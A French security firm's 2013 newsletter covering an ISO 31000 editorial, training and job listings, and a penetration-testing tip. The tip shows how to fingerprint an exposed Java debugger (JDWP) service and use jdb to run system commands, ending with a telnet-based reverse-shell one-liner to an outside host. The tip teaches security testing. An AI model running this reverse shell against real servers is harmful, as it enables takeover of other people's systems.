[Newsletter HSC] N°108 - Août 2013

Newsletter d'information de HSC newsletter at hsc-news.com
Ven 2 Aou 16:21:01 CEST 2013


========================================================================
              HSC Newsletter  --  N°108 --  aout 2013
========================================================================





     « Etre homme, c'est précisément être responsable. C'est sentir,
       en posant sa pierre, que l'on contribue à bâtir le monde. »


                                             [ Antoine de Saint-Exupery ]




--[ Sommaire ]----------------------------------------------------------

      1. Éditorial : ISO 31000 (Gestion des Risques)
      2. Le saviez-vous ? La question
      3. Formation certifiante SANS FOR408 Inforensique
      4. Formation certifiante EBIOS Risk Manager
      5. Offres d'emploi pour consultants
      6. Agenda des interventions publiques
      7. Prochaines formations HSC
      8. Actualité des associations : Club 27001 et OSSIR
      9. Le saviez-vous ? La réponse



--[ 1. Éditorial - Thomas Le Poëtvin ]----------------------------------

     La gestion des risques est omniprésente. Dans tous les secteurs
 d'activité : financier, environnemental, industriel, sanitaire, sécurité
 des systèmes d'information, etc.. Quel que soit le type et la dimension de
 l'organisme, ainsi que la nature des risques. Pourquoi gérer les risques ?
 pour connaître les effets qu'auraient d'éventuels écarts avec les objectifs
 à atteindre afin de les anticiper.
 Publiée en 2009, nous entendons de plus en plus parler de la norme
 internationale ISO 31000 sur le "management du risque - Principes et lignes
 directrices". Certains clients et acteurs du marché font même la demande
 ou s'enorgueillissent de réaliser une appréciation des risques conforme avec
 l'ISO 31000. Pour les acteurs de la sécurité des systèmes d'information,
 soyons clair : simple et inutile. 

     Comme l'indique la norme, l'ISO 31000 n'a pas vocation à remplacer les
 autres normes ni à uniformiser la gestion des risques au sein d'un organisme.
 L'objectif poursuivi est d'harmoniser les processus de gestion des risques
 afin d'avoir un vocabulaire et une structure communs à toutes les méthodes
 de gestion de risques indépendamment de la nature des risques ou des
 spécificités sectorielles. A noter qu'il s'agit d'ailleurs de la principale
 raison de la révision en 2011 de l'ISO 27005 sur la "gestion des risques en
 sécurité de l'information" qui s'est conformée avec l'ISO 31000.
 Autre point positif, comme toutes les normes ISO, la 31000 met beaucoup en
 avant la notion d'amélioration continue, non seulement sur le processus de
 gestion des risques mais aussi sur les risques eux-mêmes.
 Malgré ces quelques points positifs, l'ISO 31000 est volontairement imprécise
 et se cantonne au sempiternel : identification, analyse, évaluation et
 traitement des risques. 
 Malheureusement, cette trop grande liberté nuit à l'intérêt du document,
 notamment sur un aspect fondamental : la norme ne définit pas clairement les
 composantes que l'on doit impérativement retrouver dans un risque (source,
 cause, évènements, impact, conséquences, etc..).

     Autre sujet révélateur sur la condition de l'ISO 31000 : la norme
 ISO 22301 sur la "sécurité sociétale - système de management de la continuité
 d'activité (SMCA) [1]" publiée en 2012 et encore relativement méconnue.
 L'appréciation des risques est présentée dans la norme ISO 22301 comme une
 composante indispensable, au même titre que l'analyse des impacts métier
 (BIA, Business Impact Analysis), pour la définition des stratégies de
 continuité d'activité. Cette étape impose un arbitrage des risques par une
 démarche structurée. 
 Dans sa version de travail, la norme ISO 22301 recommandait l'ISO 27005 pour
 réaliser l'appréciation des risques, étape bien souvent négligée en
 continuité d'activité. En dehors du fait que les acteurs de la continuité
 ont probablement voulu ne pas mettre trop en avant l'informatique en
 référençant l'ISO 27005, c'est surtout son remplacement par l'ISO 31000
 qui nous fait comprendre : "faites ce que vous voulez en gestion des risques
 dans le cadre de la continuité d'activité", puisqu'aujourd'hui aucune norme
 n'est prévue pour expliciter comment réaliser une appréciation des risques
 dans le domaine.

     L'ISO 27005 qui constitue une méthode à part entière peut s'appliquer
 de manière très différente dans le cadre d'une appréciation des risques
 globale, à l'échelle d'un projet, un SMSI ou même un PCA ou un SMCA. C'est
 d'ailleurs pour cette raison qu'HSC a complété la formation ISO 27005 [2]
 avec une formation sur la gestion des risques avancée [3].
 On peut dès lors s'interroger sur la pertinence et le contenu des formations
 ISO 31000 proposées sur le marché. Puisque cette norme est générique, les
 formateurs aborderont uniquement des concepts globaux inapplicables ou
 présenteront le dérivé d'une méthode qui pourra varier considérablement
 selon le secteur d'activité dont est issu le formateur.
 Pour illustrer ce propos, HSC réalise des appréciations des risques dérivées
 de l'ISO 27005 lors de la réalisation de prestations en continuité d'activité
 tout en respectant les normes ISO 22301 et ISO 31000.

     Pour en savoir plus, une présentation sur l'ISO 22301 et l'ISO 31000
 avait été réalisée en 2012 à la conférence "Gestion stratégiques des risques
 et Plans de Continuité d'Activité" [4]


[1] http://www.hsc-formation.fr/formations/iso22li.html.fr
[2] http://www.hsc-formation.fr/formations/iso27005riskmanager.html.fr
[3] http://www.hsc-formation.fr/formations/rma.html.fr
[4] http://www.hsc.fr/ressources/presentations/MarcusEvans12-Intro22301/MarcusEvans12-Intro22301.pdf



--[ 2. Le saviez-vous ? La question ]-----------------------------------

     Le "Java Debugger" (jdb) utilise le protocole JDWP pour communiquer lors
 du débogue distant d'applications Java.

     Savez-vous comment exploiter la présence d'un processus jdb en écoute sur
 le réseau pour exécuter des commandes systèmes et ainsi prendre le
 contrôle du serveur hébergeant ce service ?

     Réponse au paragraphe 9.



--[ 3. Formation SANS FOR408 Inforensique Windows ]---------------------

     HSC propose la formation SANS FOR408 "Inforensique Windows " du 16
 au 20 septembre prochain. Cette formation s'adressant a un public 
 limité, elle n'est dispensée qu'une seule fois par an et la prochaine 
 session sera en 2014. Il faut donc profiter de la session de septembre !

     La formation FOR408 est la formation de base pour aborder 
 l'investigation numérique. Elle est un préalable pour suivre ensuite les 
 autres formations plus avancées de SANS comme la formation FOR508.

 Durant cinq jours, vous allez apprendre à :
     - Mener à bien des études inforensiques de systèmes Windows
     - Collecter et analyser l'information se trouvant sur les systèmes 
       informatiques pour retrouver les traces des activités d'utilisateurs
     - Réaliser des acquisitions de média et analyses de données
     - Utiliser les outils inforensiques

 Cette formation prépare à la certification GIAC Certified Forensic Examiner :
 GCFE (http://www.giac.org/certification/certified-forensic-examiner-gcfe).

 Cette formation inclut des travaux pratiques avec un ordinateur par stagiaire.

 Tous les détails, objectifs, plan détaillé, etc, sont disponibles sur :
 http://www.hsc-formation.fr/formations/for408_forensic_windows.html.fr

 Pour tout renseignement, ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 141 409 704



--[ 4. Formation EBIOS Risk Manager ]-----------------------------------

     HSC propose la formation EBIOS Risk Manager du 7 au 9 octobre prochain.
 Celle-ci permet d'acquérir la nouvelle certification EBIOS Risk Manager
 lancée par LSTI (http://www.lsti-certification.fr/).

 EBIOS (Etude des Besoins et Identification des Objectifs de Sécurité) s'est
 imposée comme la méthodologie phare en France pour apprécier les risques,
 particulièrement dans le secteur public. EBIOS permet d'identifier les
 risques d'un système en construction ou d'un projet et demeure idéale pour
 la rédaction de cahier des charges.
 EBIOS est recommandée par l'ANSSI pour l'élaboration de PSSI et schéma
 directeur, pour l'homologation de téléservice dans le cadre du RGS, et
 dans le guide GISSIP.
 EBIOS est recommandée par la CNIL pour réaliser des analyses d'impacts sur les
 données nominatives (PIA ou Privacy Impact Assessment).

 Durant trois jours, vous allez apprendre à :
     - Appréhender la méthode EBIOS 2010 et ses différents cas d'utilisation
     - Maîtriser la construction d'un processus de gestion des risques
     - Piloter, réaliser et mener à bien une appréciation des risques EBIOS

 Cette formation inclut des travaux pratiques en petit groupe.

 Tous les détails, objectifs, formateurs, plan détaillé, etc, sont disponibles
 sur : http://www.hsc-formation.fr/formations/ebios-risk-manager.html

 Pour tout renseignement, ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 141 409 704



--[ 5. Offres d'emploi pour consultants en sécurité ]-------------------

  +------------------------------------------------------------------------+
  | HSC recherche des consultants techniques expérimentés 2 à 6 ans d'exp. |
  +------------------------------------------------------------------------+

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC,
 (intrusion, inforensique, Windows, SCADA, etc) soit 2 à 6 semaines de
 formations suivies dans le cadre de la prise de fonction.

     Tous les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la
 gare Saint-Lazare. Les locaux sont spacieux et climatisés (735 m2), avec
 réfectoire et espace détente. Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ascii (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 6. Agenda des interventions publiques ]-----------------------------

 - 24 septembre 2013 - Afterworks Athena Global Services - Paris, Musée du vin
   "Politique de sécurité et outils techniques"
   Hervé Schauer

 - 16 octobre 2013 - Conférence SecureParis 2013 - Paris, organisée par ISC2
   "Comment gérer les problèmes de sécurité SCADA ?"
   Hervé Schauer
   https://www.isc2.org/EventDetails.aspx?id=10819

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 7. Prochaines formations HSC ]--------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27005 Risk Manager    ..............    : 4 au 6 septembre (#)
        ISO 27001 Lead Auditor    ..............    : 9 au 13 septembre (#)
        Sécurité du WiFi    ....................    : 12 et 13 septembre (*)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 16 au 20 septembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 16 au 20 septembre (#)
        Formation CISSP    .....................    : 23 au 27 septembre (#)
        ISO 22301 Lead Auditor    ..............    : 23 au 27 septembre (#)
        Correspondant Informatique et Libertés      : 26 et 27 septembre (@)
        Sécurité du Cloud Computing    .........    : 30 septembre au 2 octobre
        Fondamentaux & principes de la SSI 
        (SANS SEC401/GIAC GSEC)   ..............    : 30 sept au 5 oct (*)(#)
        Essentiels de l'ISO22301    ............    : 3 octobre
        Essentiels de l'ISO27001    ............    : 4 octobre
        EBIOS Risk Manager    ..................    : 7 au 9 octobre (#)
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 7 au 11 octobre (*)(#)
        Formation RSSI    ......................    : 7 au 11 octobre
        ISO 27001 Lead Implementer    ..........    : 14 au 18 octobre (#)
        Protéger les applis web (DEV522 /GIAC GWEB) : 14 au 18 octobre (*)(#)
        ISO 27005 Risk Manager    ..............    : 14 au 16 octobre (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 21 au 25 octobre (*)(#)
        Correspondant Informatique et Libertés      : 24 et 25 octobre (@)
        Rétroingénierie de logiciels malfaisants :
        Outils et techniques d'analyse 
        (SANS FOR610/GIAC GREM)   ..............    : 4 au 8 novembre (*)
        ISO 27001 Lead Implementer    ..........    : 4 au 8 novembre (#)
        Essentiels techniques de la SSI    .....    : 12 et 13 novembre
        PKI : principes et mise en oeuvre    ...    : 12 au 14 novembre (*)
        Essentiels juridiques pour gérer la SSI     : 14 et 15 novembre
        Sécurité SCADA  ........................    : 15 novembre
        Essentiel de PCI-DSS    ................    : 21 novembre
        RGS : la SSI pour le secteur public    .    : 22 novembre
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 18 au 22 novembre (*)(#)
        Formation DNSSEC   .....................    : 28 et 29 novembre (*)
        Tests d'intrusion avancés, exploitation de
        failles et hacking éthique (SEC660/GXPN)    : 25 au 30 novembre (*)(#)
        Correspondant Informatique et Libertés      : 2 et 3 décembre (@)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 2 au 6 décembre (*)(#)
        ISO 22301 Lead Implementer    ..........    : 9 au 13 décembre (#)
        Mesures de sécurité ISO 27002   ........    : 10 et 11 décembre
        Gestion des incidents de sécurité/ISO27035  : 12 décembre
        Indicateurs & tableaux de bord SSI/ISO27004 : 13 décembre
        Risk Manager Avancé    .................    : 19 et 20 décembre
        Techniques de hacking, exploitation de failes
        et gestion des incidents (SEC504/GCIH)      : 16 au 20 décembre (*)(#)
        Inforensique réseau & infrastruct. (FOR558) : 1er semestre 2014 (*)
        Inforensique téléphones/ordiphones (FOR563) : 1er semestre 2014 (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2 ou GIAC
 (@) : formation labellisée par la CNIL (www.cnil.fr)


 - Luxembourg
        ISO 27005 Risk Manager    ..............    : 18 au 20 octobre (#)
        ISO 27001 Lead Auditor    ..............    : 18 au 22 novembre (#)
        ISO 22301 Lead Implementer    ..........    : février 2014 (#)
        ISO 27001 Lead Implementer    ..........    : octobre 2014 (#)

 - Lille
        Correspondant Informatique et Libertés      : 2014 (@)

 - Limoges
        Correspondant Informatique et Libertés      : mars 2014 (@)

 - Lyon
        Correspondant Informatique et Libertés      : 19 et 20 sept (@)
        ISO 27005 Risk Manager    ..............    : 2 au 4 octobre (#)
        Essentiels juridiques pour gérer la SSI     : 28 au 29 novembre
        ISO 27001 Lead Implementer    ..........    : 2ième trimestre 2014

 - Marseille
        ISO 22301 Lead Implementer    ..........    : 4ieme trimestre 2014 (#)
        Correspondant Informatique et Libertés      : mars 2014 (@)

 - Montpellier
        Correspondant Informatique et Libertés      : 17 et 18 octobre 2013 (@)

 - Nancy
        Correspondant Informatique et Libertés      : mi-2014 (@)

 - Nantes
        Correspondant Informatique et Libertés      : mai 2014 (@)

 - Nice
        Correspondant Informatique et Libertés      : 12 et 13 septembre (@)
        ISO 27005 Risk Manager    ..............    : juin 2014 (#)

 - Pau
        Correspondant Informatique et Libertés      : mai 2014 (@)

 - Poitiers
        Correspondant Informatique et Libertés      : juin 2014 (@)

 - Reims
        Correspondant Informatique et Libertés      : 21 et 22 novembre (@)

 - Rennes
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Correspondant Informatique et Libertés      : juin 2014 (@)

 - Strasbourg
        Correspondant Informatique et Libertés .    : juin 2014 (@)

 - Toulouse
        Essentiels juridiques pour gérer la SSI     : 8 et 9 octobre
        Correspondant Informatique et Libertés .    : 19 et 20 décembre (@)
        ISO 27005 Risk Manager    ..............    : mai 2014 (#)
        ISO 27001 Lead Implementer    ..........    : juin 2014 (#)
        ISO 27001 Lead Auditor    ..............    : juin 2015 (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Moody sur
 ses formations.

 Pour tout renseignement, ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 141 409 704

 Retrouvez les tarifs des formations dans la Newsletter n° 64 de janvier 2010
 au chapitre 6 : http://www.hsc-news.com/archives/2010/000064.html

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2012 en PDF sur http://www.hsc-formation.fr/



--[ 8. Actualité des associations : Club 27001 et OSSIR ]-----------------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris le mercredi 19 septembre 2013 avec
       l'assemblée générale annuelle.
          - Programme en cours d'élaboration
     . Prochaine réunion à Toulouse le jeudi 4 juillet à 13h45 chez CS-SI
          - Débat sur la vie privée à l'horizon 2020
     . Prochaines réunions à Marseille, Rennes et Lyon annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 9 juillet à 14h00 à l'INRIA 13ième
           - Titre en cours de confirmation, par Bernard Montel (RSA)
           - Sécurité des accessoires Apple par Mathieu Renard (Sogeti)
           - Revue d'actualité par Nicolas Ruff (EADS)
     . Réunion suivante à Paris le mardi 10 septembre 2013
     . Réunion suivante à Paris le mardi 8 octobre 2013
     . Prochaine réunion à Rennes jeudi 27 septembre 2013
     . Prochaine réunion à Toulouse mardi 17 septembre 2013
     . JSSI de l'OSSIR le lundi 17 mars 2014, réservez votre date, les
       GS-DAYS suivront le 18 mars 2014 (www.gsdays.fr).



--[ 9. Le saviez-vous ? La réponse ]-------------------------------------

    Lors d'un test d'intrusion il arrive d'identifier un port TCP correspondant
 au service JDWP suite à un scan Nmap:

   Nmap scan report for 192.168.111.208
   Host is up (0.00091s latency).
   PORT     STATE SERVICE VERSION
   7000/tcp open  jdwp    unknown

 Nmap contient le script NSE jdwp-version qui retourne normalement la version
 du protocole JDWP du service en écoute. Lorsque Nmap n'arrive pas à découvrir
 la version du service il est toujours possible d'activer l'option
 "--script-trace" pour afficher la trace d'exécution du script NSE.

   $ nmap -sS -sV  --script-trace --script=jdwp-version -p 7000 192.168.111.208 

   Starting Nmap 6.01 ( http://nmap.org ) at 2013-08-02 10:02 CEST
   NSOCK (2.2680s) TCP connection requested to 192.168.111.208:7000 (IOD #1) EID 8
   NSOCK (2.2690s) Callback: CONNECT SUCCESS for EID 8 [192.168.111.208:7000]
   [...]
   00000030: 00 00 01 80 00 00 00 00 00 ad 4a 61 76 61 20 44           Java D
   00000040: 65 62 75 67 20 57 69 72 65 20 50 72 6f 74 6f 63 ebug Wire Protoc
   00000050: 6f 6c 20 28 52 65 66 65 72 65 6e 63 65 20 49 6d ol (Reference Im
   00000060: 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 29 20 76 65 plementation) ve
   00000070: 72 73 69 6f 6e 20 31 2e 36 0a 4a 56 4d 20 44 65 rsion 1.6 JVM De
   00000080: 62 75 67 20 49 6e 74 65 72 66 61 63 65 20 76 65 bug Interface ve
   00000090: 72 73 69 6f 6e 20 31 2e 32 0a 4a 56 4d 20 76 65 rsion 1.2 JVM ve
   000000a0: 72 73 69 6f 6e 20 31 2e 37 2e 30 5f 30 37 20 28 rsion 1.7.0_07 (
   000000b0: 4a 61 76 61 20 48 6f 74 53 70 6f 74 28 54 4d 29 Java HotSpot(TM)
   000000c0: 20 36 34 2d 42 69 74 20 53 65 72 76 65 72 20 56  64-Bit Server V
   000000d0: 4d 2c 20 6d 69 78 65 64 20 6d 6f 64 65 2c 20 73 M, mixed mode, s
   000000e0: 68 61 72 69 6e 67 29 00 00 00 01 00 00 00 06 00 haring)         
   000000f0: 00 00 08 31 2e 37 2e 30 5f 30 37 00 00 00 21 4a    1.7.0_07   !J
   00000100: 61 76 61 20 48 6f 74 53 70 6f 74 28 54 4d 29 20 ava HotSpot(TM) 
   00000110: 36 34 2d 42 69 74 20 53 65 72 76 65 72 20 56 4d 64-Bit Server VM
   [...]

 La trace d'exécution contient le plus souvent la version du protocole même
 quand le script NSE n'est pas capable de la retrouver. Ici, c'est la version
 1.6 qui est utilisée.

 Après avoir identifié la présence de ce service et sa version, il est
 possible de tenter une connexion à ce service en utilisant le binaire jdb
 fournit avec la JDK :

   $ jdb -version
   This is jdb version 1.6 (J2SE version 1.6.0_26)
   $ jdb -attach 192.168.111.208:7000
   Set uncaught java.lang.Throwable
   Set deferred uncaught java.lang.Throwable
   Initializing jdb ...
   VM Started: No frames on the current call stack
   main[1]

 Une invite de commande est accessible. La commande help offre de nombreuses
 informations sur les commandes disponibles. Deux commandes sont
 particulièrement intéressantes car elles permettent d'exécuter du code
 simplement : print et eval. Par exemple, à l'aide de la commande suivante on
 peut instancier un objet de type String et en afficher sa longueur :

   print new java.lang.String("Blah").length()
   new java.lang.String("Blah").length() = 4

 
 Il est par exemple possible d'utiliser la classe ProcessBuilder qui permet 
 d'exécuter des commandes système. La commande suivante va créer un "reverse
 shell" permettant d'exécuter des commandes arbitraires sur le serveur :

   print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "telnet 10.6.6.6 8888 | /bin/sh | telnet 10.6.6.6 9999")).start()

 D'autres exemples de reverse shell sont fournis dans le "Le saviez-vous ?" de
 la newsletter de mai 2011 http://www.hsc-news.com/archives/2011/000082.html 




Plus d'informations sur la liste de diffusion newsletter